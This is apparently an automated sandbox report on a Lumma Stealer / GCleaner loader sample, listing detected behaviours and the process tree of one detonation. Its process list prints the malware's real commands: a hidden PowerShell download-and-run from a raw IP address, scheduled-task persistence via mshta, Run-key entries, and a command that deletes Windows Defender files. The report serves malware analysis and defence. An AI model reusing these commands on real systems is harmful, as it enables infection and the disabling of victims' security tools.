Malware Analysis Report

2025-08-10 19:57

Sample ID 250630-vsqp7saq2y
Target be49e07b0ddf04f073a8fddffa380c816c672431f1b54ae73753772029289e61.bin
SHA256 be49e07b0ddf04f073a8fddffa380c816c672431f1b54ae73753772029289e61
Tags
gcleaner lumma defense_evasion discovery execution loader persistence spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

be49e07b0ddf04f073a8fddffa380c816c672431f1b54ae73753772029289e61

Threat Level: Known bad

The file be49e07b0ddf04f073a8fddffa380c816c672431f1b54ae73753772029289e61.bin was found to be: Known bad.

Malicious Activity Summary

gcleaner lumma defense_evasion discovery execution loader persistence spyware stealer

Lumma Stealer, LummaC

GCleaner

Lumma family

Gcleaner family

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Sets service image path in registry

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Stops running service(s)

Reads user/profile data of local email clients

Checks computer location settings

Loads dropped DLL

Identifies Wine through registry keys

Executes dropped EXE

Checks BIOS information in registry

Adds Run key to start application

Checks installed software on the system

Enumerates processes with tasklist

Suspicious use of NtSetInformationThreadHideFromDebugger

AutoIT Executable

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Modifies data under HKEY_USERS

Suspicious behavior: LoadsDriver

Suspicious use of FindShellTrayWindow

Scheduled Task/Job: Scheduled Task

Suspicious use of AdjustPrivilegeToken

Modifies registry key

Kills process with taskkill

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Delays execution with timeout.exe

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-06-30 17:15

Signatures

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-06-30 17:15

Reported

2025-06-30 17:17

Platform

win10v2004-20250610-en

Max time kernel

109s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\be49e07b0ddf04f073a8fddffa380c816c672431f1b54ae73753772029289e61.exe"

Signatures

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10525530101\a2dec68a76.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\IObitUnlocker\ImagePath = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IObitUnlocker\\IObitUnlocker.sys" C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe N/A

Stops running service(s)

defense_evasion execution

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10525530101\a2dec68a76.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10525530101\a2dec68a76.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3001560346-2020497773-4190896137-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3001560346-2020497773-4190896137-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\RoamingY9C2CH7OR3SXZYEAULUX5B50BMNOIUOS.EXE N/A
Key value queried \REGISTRY\USER\S-1-5-21-3001560346-2020497773-4190896137-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3001560346-2020497773-4190896137-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10525550101\index.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3001560346-2020497773-4190896137-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3001560346-2020497773-4190896137-1000\Control Panel\International\Geo\Nation C:\Temper\dHzrrTgp.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\RoamingY9C2CH7OR3SXZYEAULUX5B50BMNOIUOS.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10525530101\a2dec68a76.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10525540101\593a78ecfe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10525550101\index.exe N/A
N/A N/A C:\Temper\mSPVyMsH.exe N/A
N/A N/A C:\Temper\pTLQnagR.exe N/A
N/A N/A C:\Temper\pzoljWug.exe N/A
N/A N/A C:\Temper\dHzrrTgp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Work\nircmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Work\NSudoLG.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost015.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10525560101\0538aa2642.exe N/A
N/A N/A C:\Users\Admin\AppData\RoamingLWSLVVEH8CXRQMJM7LF4WXNYLUJCFBVW.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Work\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3001560346-2020497773-4190896137-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10525530101\a2dec68a76.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost015.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A

Reads user/profile data of local email clients

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3001560346-2020497773-4190896137-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0538aa2642.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10525560101\\0538aa2642.exe" C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3001560346-2020497773-4190896137-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a2dec68a76.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10525530101\\a2dec68a76.exe" C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3001560346-2020497773-4190896137-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\index.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10525550101\\index.exe" C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe N/A

Checks installed software on the system

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10525530101\a2dec68a76.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1628 set thread context of 4800 N/A C:\Users\Admin\AppData\Local\Temp\10525540101\593a78ecfe.exe C:\Users\Admin\AppData\Local\Temp\svchost015.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\dumer.job C:\Users\Admin\AppData\RoamingY9C2CH7OR3SXZYEAULUX5B50BMNOIUOS.EXE N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10525560101\0538aa2642.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mode.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temper\pTLQnagR.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10525540101\593a78ecfe.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temper\mSPVyMsH.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\svchost015.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\RoamingLWSLVVEH8CXRQMJM7LF4WXNYLUJCFBVW.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\find.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\RoamingY9C2CH7OR3SXZYEAULUX5B50BMNOIUOS.EXE N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize\AppsUseLightTheme = "0" C:\Windows\SysWOW64\reg.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10525530101\a2dec68a76.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Work\NSudoLG.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Temper\pTLQnagR.exe N/A
Token: 35 N/A C:\Temper\pTLQnagR.exe N/A
Token: SeSecurityPrivilege N/A C:\Temper\pTLQnagR.exe N/A
Token: SeSecurityPrivilege N/A C:\Temper\pTLQnagR.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Work\NSudoLG.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Work\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\Work\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Work\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Work\7z.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4556 wrote to memory of 5320 N/A C:\Users\Admin\AppData\Local\Temp\be49e07b0ddf04f073a8fddffa380c816c672431f1b54ae73753772029289e61.exe C:\Windows\SysWOW64\cmd.exe
PID 4556 wrote to memory of 6032 N/A C:\Users\Admin\AppData\Local\Temp\be49e07b0ddf04f073a8fddffa380c816c672431f1b54ae73753772029289e61.exe C:\Windows\SysWOW64\mshta.exe
PID 5320 wrote to memory of 2900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 6032 wrote to memory of 1972 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1972 wrote to memory of 5016 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\RoamingY9C2CH7OR3SXZYEAULUX5B50BMNOIUOS.EXE
PID 5016 wrote to memory of 3584 N/A C:\Users\Admin\AppData\RoamingY9C2CH7OR3SXZYEAULUX5B50BMNOIUOS.EXE C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe
PID 3584 wrote to memory of 5180 N/A C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe C:\Users\Admin\AppData\Local\Temp\10525530101\a2dec68a76.exe
PID 3584 wrote to memory of 1628 N/A C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe C:\Users\Admin\AppData\Local\Temp\10525540101\593a78ecfe.exe
PID 3584 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe C:\Users\Admin\AppData\Local\Temp\10525550101\index.exe
PID 3788 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\10525550101\index.exe C:\Temper\mSPVyMsH.exe
PID 3476 wrote to memory of 1480 N/A C:\Temper\mSPVyMsH.exe C:\Windows\SysWOW64\cmd.exe
PID 1480 wrote to memory of 2296 N/A C:\Windows\SysWOW64\cmd.exe C:\Temper\pTLQnagR.exe
PID 3476 wrote to memory of 2248 N/A C:\Temper\mSPVyMsH.exe C:\Temper\pzoljWug.exe
PID 3476 wrote to memory of 5456 N/A C:\Temper\mSPVyMsH.exe C:\Temper\dHzrrTgp.exe
PID 3476 wrote to memory of 4556 N/A C:\Temper\mSPVyMsH.exe C:\Windows\SysWOW64\cmd.exe
PID 4556 wrote to memory of 5616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 5456 wrote to memory of 3036 N/A C:\Temper\dHzrrTgp.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\Work\nircmd.exe
PID 3036 wrote to memory of 4792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3036 wrote to memory of 3616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3036 wrote to memory of 4520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3036 wrote to memory of 4972 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\Work\NSudoLG.exe

Processes

C:\Users\Admin\AppData\Local\Temp\be49e07b0ddf04f073a8fddffa380c816c672431f1b54ae73753772029289e61.exe

"C:\Users\Admin\AppData\Local\Temp\be49e07b0ddf04f073a8fddffa380c816c672431f1b54ae73753772029289e61.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn qtAfdma3v2s /tr "mshta C:\Users\Admin\Desktop\jVtmykf5T.hta" /sc minute /mo 10 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\Desktop\jVtmykf5T.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn qtAfdma3v2s /tr "mshta C:\Users\Admin\Desktop\jVtmykf5T.hta" /sc minute /mo 10 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:APPDATA+'Y9C2CH7OR3SXZYEAULUX5B50BMNOIUOS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.156.72.2/testmine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\RoamingY9C2CH7OR3SXZYEAULUX5B50BMNOIUOS.EXE

"C:\Users\Admin\AppData\RoamingY9C2CH7OR3SXZYEAULUX5B50BMNOIUOS.EXE"

C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe

"C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe"

C:\Users\Admin\AppData\Local\Temp\10525530101\a2dec68a76.exe

"C:\Users\Admin\AppData\Local\Temp\10525530101\a2dec68a76.exe"

C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe

C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe

C:\Users\Admin\AppData\Local\Temp\10525540101\593a78ecfe.exe

"C:\Users\Admin\AppData\Local\Temp\10525540101\593a78ecfe.exe"

C:\Users\Admin\AppData\Local\Temp\10525550101\index.exe

"C:\Users\Admin\AppData\Local\Temp\10525550101\index.exe"

C:\Temper\mSPVyMsH.exe

"C:\Temper\mSPVyMsH.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c ""C:\Temper\pTLQnagR.exe" x -aoa -bso0 -bsp1 "C:\Temper\BJwqsqOu.zip" -pXx7hItTR -o"C:\Temper""

C:\Temper\pTLQnagR.exe

"C:\Temper\pTLQnagR.exe" x -aoa -bso0 -bsp1 "C:\Temper\BJwqsqOu.zip" -pXx7hItTR -o"C:\Temper"

C:\Temper\pzoljWug.exe

"C:\Temper\pzoljWug.exe"

C:\Temper\dHzrrTgp.exe

"C:\Temper\dHzrrTgp.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn "duLGPTLJO" /tr "C:\Temper\mSPVyMsH.exe" /sc minute /mo 10 /ru "Admin" /f

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "duLGPTLJO" /tr "C:\Temper\mSPVyMsH.exe" /sc minute /mo 10 /ru "Admin" /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\l5SkW3O.bat" "

C:\Users\Admin\AppData\Local\Temp\Work\nircmd.exe

nircmd win min process "cmd.exe"

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\reg.exe

reg query "HKU\S-1-5-19"

C:\Windows\SysWOW64\reg.exe

reg add "HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v "AppsUseLightTheme" /t reg_dword /d 0 /f

C:\Users\Admin\AppData\Local\Temp\Work\NSudoLG.exe

NSudoLG -U:T -P:E -UseCurrentConsole "C:\Users\Admin\AppData\Local\Temp\l5SkW3O.bat" any_word

C:\Users\Admin\AppData\Local\Temp\svchost015.exe

C:\Users\Admin\AppData\Local\Temp\svchost015.exe

C:\Users\Admin\AppData\Local\Temp\10525560101\0538aa2642.exe

"C:\Users\Admin\AppData\Local\Temp\10525560101\0538aa2642.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn LKALfma4sBr /tr "mshta C:\Users\Admin\Desktop\v8uiRYqvH.hta" /sc minute /mo 10 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\Desktop\v8uiRYqvH.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn LKALfma4sBr /tr "mshta C:\Users\Admin\Desktop\v8uiRYqvH.hta" /sc minute /mo 10 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:APPDATA+'LWSLVVEH8CXRQMJM7LF4WXNYLUJCFBVW.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.156.72.2/testmine/random.exe',$d);Start-Process $d;

C:\Windows\SysWOW64\mode.com

Mode 79,49

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ver

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA"

C:\Windows\SysWOW64\find.exe

find /i "0x0"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c tasklist

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\WinDefend"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\MDCoreSvc"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\WdNisSvc"

C:\Users\Admin\AppData\RoamingLWSLVVEH8CXRQMJM7LF4WXNYLUJCFBVW.EXE

"C:\Users\Admin\AppData\RoamingLWSLVVEH8CXRQMJM7LF4WXNYLUJCFBVW.EXE"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\Sense"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\wscsvc"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\SgrmBroker"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\SecurityHealthService"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\webthreatdefsvc"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\webthreatdefusersvc"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\WdNisDrv"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\WdBoot"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\WdFilter"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\SgrmAgent"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\MsSecWfp"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\MsSecFlt"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\MsSecCore"

C:\Windows\SysWOW64\reg.exe

reg query HKLM\System\CurrentControlset\Services\WdFilter

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v "ProductName"

C:\Windows\SysWOW64\find.exe

find /i "Windows 7"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ver "

C:\Windows\SysWOW64\findstr.exe

findstr /c:"6.1.7601"

C:\Users\Admin\AppData\Local\Temp\Work\7z.exe

7z x -aoa -bso0 -bsp1 "DKT.zip" -p"DDK" "Unlocker.exe"

C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe

Unlocker /CurrentDiskSize

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc query IObitUnlocker

C:\Windows\system32\sc.exe

sc query IObitUnlocker

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /f /pid "2932"

C:\Windows\system32\taskkill.exe

taskkill /f /pid "2932"

C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe

Unlocker /dеlwd

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc query IObitUnlocker

C:\Windows\system32\sc.exe

sc query IObitUnlocker

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc stop IObitUnlocker & sc delete IObitUnlocker

C:\Windows\system32\sc.exe

sc stop IObitUnlocker

C:\Windows\system32\sc.exe

sc delete IObitUnlocker

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /f /pid "3956"

C:\Windows\system32\taskkill.exe

taskkill /f /pid "3956"

C:\Windows\SysWOW64\timeout.exe

timeout /t 2 /nobreak

C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe

Unlocker /DеlWD

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc query IObitUnlocker

C:\Windows\system32\sc.exe

sc query IObitUnlocker

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\S